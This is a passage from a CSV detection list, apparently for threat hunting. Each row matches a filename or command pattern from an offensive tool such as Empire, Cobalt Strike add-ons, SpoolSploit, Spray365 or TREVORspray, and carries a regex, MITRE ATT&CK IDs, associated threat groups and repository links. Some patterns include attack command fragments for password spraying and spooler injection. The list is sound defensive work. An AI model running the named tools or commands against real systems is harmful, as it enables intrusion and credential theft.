T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferRepeat*",".{0,1000}SpooferRepeat.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*",".{0,1000}SPOOFING\sGROUP\sPOLICY\sTEMPLATE\sLOCATION\sTHROUGH\sgPCFileSysPath.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*Spoofy/spoofy.py*",".{0,1000}Spoofy\/spoofy\.py.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*SpookFlare*",".{0,1000}SpookFlare.{0,1000}","offensive_tool_keyword","SpookFlare","SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader/dropper generator for Meterpreter. Empire. Koadic etc. SpookFlare has obfuscation. encoding. run-time code compilation and character substitution features.","T1027 - T1029 - T1218 - T1112","TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hlldz/SpookFlare","1","0","N/A","N/A","10","943","190","2019-05-08T09:03:45Z","2017-11-13T17:22:12Z" "*spookflare.py*",".{0,1000}spookflare\.py.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*spool_sploit.py*",".{0,1000}spool_sploit\.py.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*spooler_check*",".{0,1000}spooler_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*SpoolSample.exe * *",".{0,1000}SpoolSample\.exe\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*SpoolSample_v4.5_x64.exe*",".{0,1000}SpoolSample_v4\.5_x64\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*SpoolSploit/*",".{0,1000}SpoolSploit\/.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*spoolsploit:latest*",".{0,1000}spoolsploit\:latest.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*spoolss_##*",".{0,1000}spoolss_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*spoolsystem inject*",".{0,1000}spoolsystem\sinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*spoolsystem spawn*",".{0,1000}spoolsystem\sspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*spoolsystem.cna*",".{0,1000}spoolsystem\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger.x64.dl*",".{0,1000}SpoolTrigger\.x64\.dl.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger.x64.dll*",".{0,1000}SpoolTrigger\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger.x86.dl*",".{0,1000}SpoolTrigger\.x86\.dl.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger.x86.dll*",".{0,1000}SpoolTrigger\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger\SpoolTrigger.*",".{0,1000}SpoolTrigger\\SpoolTrigger\..{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*Spray an empty password across the Domain*",".{0,1000}Spray\san\sempty\spassword\sacross\sthe\sDomain.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*spray* --recon *.* -u *.txt --threads 10*",".{0,1000}spray.{0,1000}\s\-\-recon\s.{0,1000}\..{0,1000}\s\-u\s.{0,1000}\.txt\s\-\-threads\s10.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*Spray365.git*",".{0,1000}Spray365\.git.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*spray365.py*",".{0,1000}spray365\.py.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*spray365_results_*.json*",".{0,1000}spray365_results_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*Spray-AD *",".{0,1000}Spray\-AD\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*Spray-AD.cna*",".{0,1000}Spray\-AD\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*Spray-AD.dll*",".{0,1000}Spray\-AD\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*SprayAD.exe *",".{0,1000}SprayAD\.exe\s.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*Spray-AD.exe*",".{0,1000}Spray\-AD\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*Spray-AD.sln*",".{0,1000}Spray\-AD\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 